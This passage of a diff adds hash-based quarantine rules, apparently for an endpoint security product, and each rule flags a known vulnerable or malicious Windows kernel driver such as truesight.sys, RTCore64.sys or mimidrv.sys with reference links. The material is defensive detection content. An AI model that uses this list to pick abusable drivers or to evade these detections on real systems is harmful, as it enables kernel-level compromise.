"2026-03-23T11:45:30.820495Z", + "creation_date": "2026-03-23T11:45:30.820497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820502Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "353a36d445e4ff60396702ad7b22b5f30bdce52aa05126e2701714a3f11a11c7", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11beae37-c0f2-517f-bc62-3e0ed64447b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818260Z", + "creation_date": "2026-03-23T11:45:30.818262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38535a0e9fc0684308eb5d6aa6284669bc9743f11cb605b79883b8c13ef906ad", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11c0f44a-12de-5f90-bba6-7c0c8d4f3ebd", 
+ "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143254Z", + "creation_date": "2026-03-23T11:45:31.143256Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db2234daab27f977b59c1d9e1540ca0dab986334bffd435233b1f9213b8f6b45", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11d9d740-1d79-51ef-b926-aa915e1794a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458607Z", + "creation_date": "2026-03-23T11:45:30.458611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.458620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f62282e44713d7d2f4c780027c7bbb82ba0b491c8836dfae33a2d82e8b5a43d2", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11ec0f90-8611-59a7-9d30-0e5646d2cdf1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147963Z", + "creation_date": "2026-03-23T11:45:31.147966Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147972Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea1fc5332092cbe167622a54ff2f118a7235a7baa948c77e39a2ffafb285b1a1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11ee222a-f75e-58c9-9b8e-1f01a57a67f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613581Z", + "creation_date": "2026-03-23T11:45:29.613582Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613588Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d9346e6f46f831e263385a9bd32428e01919cca26a035bbb8e9cb00bf410bc3", + "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1202839a-e63e-59e8-a369-0ec81d96cb57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486524Z", + "creation_date": "2026-03-23T11:45:31.486528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9799688dc73f444eae7b4b7e681ae31d6e4cfcf9c48f59ac5b6132b22e65f58f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "121621fa-2e99-5adf-a1cb-d7b99a284449", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825973Z", + "creation_date": "2026-03-23T11:45:30.825976Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825984Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d52c8e1568a6bbf29705a5be45a76a4b87dc54d557d5fd17a025c951d643b882", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "121963dd-984f-5ba1-83b8-a9e296ab6676", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816080Z", + "creation_date": "2026-03-23T11:45:30.816083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816088Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df4c02beb039d15ff0c691bbc3595c9edfc1d24e783c8538a859bc5ea537188d", + "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "121e33f0-7dc2-5f8a-9a84-e7de2621cf4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619592Z", + "creation_date": "2026-03-23T11:45:29.619594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619599Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ed10b06e6b4b0548bdada6b5665432306e934df173707edd3af9e4a4547e43e", + "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) 
[https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1224c893-5ce2-5553-8b9a-9660352e6af1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156414Z", + "creation_date": "2026-03-23T11:45:31.156416Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156422Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4373d838097eefc9de85cff89356cf450641a3b3f057cee49e7ef1333a54ceed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "122509f3-168d-5341-9365-776d9a0a5d0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.821728Z", + "creation_date": "2026-03-23T11:45:30.821732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821740Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40eef1f52c7b81750cee2b74b5d2f4155d4e58bdde5e18ea612ab09ed0864554", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12306b70-0bee-5294-813d-190b7814b118", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821300Z", + "creation_date": "2026-03-23T11:45:30.821304Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821312Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e502c2736825ea0380dd42effaa48105a201d4146e79de00713b8d3aaa98cd65", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"123f5739-b970-53e7-ac63-a51df4991e40", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467002Z", + "creation_date": "2026-03-23T11:45:30.467006Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467015Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71c0c98aa54dc88af8b094ceef88352052d592e0f40892825dedbf1abba16635", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1241a202-b03c-5c34-8347-dbdabdcbeccf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452622Z", + "creation_date": "2026-03-23T11:45:30.452625Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452633Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23787eb342fd38da73ce785023176f98304267c6f6fa8a50e718da096c7a7951", + "comment": "Vulnerable Kernel Driver (aka phydmaccx86.sys) [https://www.loldrivers.io/drivers/1055625b-3480-48b3-9556-8628a745d8f0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1241b2fe-a129-5bbc-aace-d89b135da0a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466352Z", + "creation_date": "2026-03-23T11:45:30.466355Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466363Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "efa56907b9d0ec4430a5d581f490b6b9052b1e979da4dab6a110ab92e17d4576", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1250906a-82b8-59ee-b5db-212b4b7708a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819864Z", + "creation_date": "2026-03-23T11:45:30.819866Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819884Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c049aff27517fe269517b07bdc8ef1e7b26e1e76276b02dc5a9688901a88de3", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12541cac-c629-5316-ba0e-7cd9558387db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826151Z", + "creation_date": "2026-03-23T11:45:30.826153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c3eac96b30874254834799669ba353408f3ad1e088d4294c9aabd76e8365019", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "126605a2-954b-53a9-9480-a75e716dd102", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490384Z", + "creation_date": "2026-03-23T11:45:31.490386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490391Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0abc0c88644a441a816aa86b0d10a0ed9c234b67e3deb276db29a752575b61a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "126e6280-2b2e-5132-b0a8-a5013c769903", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:30.464973Z", + "creation_date": "2026-03-23T11:45:30.464977Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464985Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a32dc2218fb1f538fba33701dfd9ca34267fda3181e82eb58b971ae8b78f0852", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1272251d-faf7-52b1-994d-8fee62ad4c06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480322Z", + "creation_date": "2026-03-23T11:45:30.480325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480335Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9cbdfc10ba743d5229f7dbb6507b9864012fb58cb253da92962dc611603a73c", + "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"127bdf0c-4bbe-5652-b13d-43c32ca67872", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486421Z", + "creation_date": "2026-03-23T11:45:31.486424Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486432Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67dcba22bf61411cf08b8969af50b289e6b39bc72be07a1d4f2a43b3d0f81f8e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12868a34-5406-56de-956a-75e25d3dec39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820195Z", + "creation_date": "2026-03-23T11:45:30.820197Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.820203Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "978a1e937dd4c03eb2f2a55a0ed8b14294c5c175584ebf85bd20b889bdc9378c", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "128a4e46-aa09-5aac-b0bd-4205c46a425f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461041Z", + "creation_date": "2026-03-23T11:45:30.461045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11208bbba148736309a8d2a4ab9ab6b8f22f2297547b100d8bdfd7d413fe98b2", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12a41168-0462-51a8-9a45-9b83bbc6b4c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475027Z", + "creation_date": "2026-03-23T11:45:31.475032Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475042Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bccfd41865d666e484b466d20329f31d9689dfe383de42cf3b8ed0465d24aa04", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "12ab50f9-6593-5e39-ab91-c40e5e43ed93", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 